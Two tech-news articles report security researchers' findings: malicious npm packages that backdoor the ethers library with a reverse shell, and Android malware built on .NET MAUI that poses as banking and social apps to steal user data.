Stealthy Npm Malware Backdoors Popular Ethereum Library - 1

Image by AltumCode, from Unsplash

Stealthy Npm Malware Backdoors Popular Ethereum Library

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Security researchers at ReversingLabs have discovered a sophisticated malware campaign targeting the npm package repository.

In a rush? Here are the quick facts:

  • Malicious npm packages ethers-provider2 and ethers-providerz create a backdoor in infected systems.
  • The malware uses multi-stage attacks, modifying ethers to embed a hidden reverse shell.
  • Attackers maintain persistence by creating loader.js, ensuring infection even after package removal.

The malicious packages, ethers-provider2 and ethers-providerz, secretly modify a widely used npm package, ethers, to create a backdoor on infected systems. The malware differs from standard npm malware because it uses complex multi-stage attacks to function.

These packages present themselves as real tools by duplicating the SSH2 package, which has received more than 350 million downloads, as noted by the researchers. The malware installs itself by stealing more harmful code, which transforms ethers to embed a concealed reverse shell feature for remote hacker access.

ReversingLabs detected the threat using its Spectra platform. The infection process begins when ethers-provider2 is installed. The downloaded script executes a second-stage malware file which self-deletes following its execution to prevent detection.

The malware checks for the presence of ethers until it detects the package then swaps provider-jsonrpc.js with a fake version that contains hidden malicious code.

The attack doesn’t stop there. The malware creates another file named loader.js that keeps the infection active after the removal of ethers-provider2.

The attackers establish a reverse shell connection during the third phase of their attack, which enables hackers to execute commands remotely through compromised SSH clients. ReversingLabs described this approach as evidence of advanced threat actor capabilities that requires additional investigation.

The researchers identified ethers-providerz as a potential test version because its coding contained multiple errors but it followed the same pattern as the first malicious package.

The security experts discovered that ethers-provider2 remained accessible on npm at the time of reporting, even though ethers-providerz had been eliminated.

Developers need to check their systems for infection signs while exclusively using trusted npm packages according to security experts.

Fake Banking And Social Apps Steal User Data Using .NET MAUI - 2

Image by Kelli McClintock, from Unsplash

Fake Banking And Social Apps Steal User Data Using .NET MAUI

  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Android malware spread through new cybercriminal tactics now utilizes Microsoft’s .NET MAUI framework.

In a rush? Here are the quick facts:

  • Malicious apps steal banking details and personal data from users.
  • Multi-stage encryption helps malware evade security scans.
  • Malware spreads through unofficial app stores and phishing links.

The McAfee Mobile Research Team discovered malware attacks that utilize .NET MAUI to evade detection systems which allows deceptive malicious applications to extract user information.

The .NET MAUI framework from Microsoft functions as a replacement for Xamarin to let developers build cross-platform applications that work on Android and iOS systems as well as Windows and macOS platforms.

The replacement technology serves as a tool for criminals who hide their malicious code inside encrypted files which makes detection by antivirus systems challenging.

The research team identified two separate malware campaigns that used .NET MAUI to disguise themselves as a banking application and a social media platform.

The fake banking application directed users from India to provide personal and financial information when they launched the program. Attackers operate a server that receives the sensitive information collected from victims.

The malware remains undetectable by traditional security tools because its harmful code exists within hidden files instead of standard Android components.

The second malware disguises itself as a social media application to deceive users who speak Chinese. The system uses complex multi-layer encryption, which protects its malicious activities and conceals its actual harmful functions.

This malware steals contacts, messages, and photos without alerting security scanners while performing its operations. The malware manipulates Android permission files to fool security scanners, and it encrypts stolen data before attackers can retrieve it.

The malware variants stay undiscovered for extended periods because of their advanced evasion techniques. Security tools become disoriented by excessive obfuscation, such as manipulating permission settings with meaningless code, which confuses security tools and disrupts analysis.

In light of these findings, people who want to avoid becoming victims should exercise extreme caution when downloading mobile applications from unknown sources.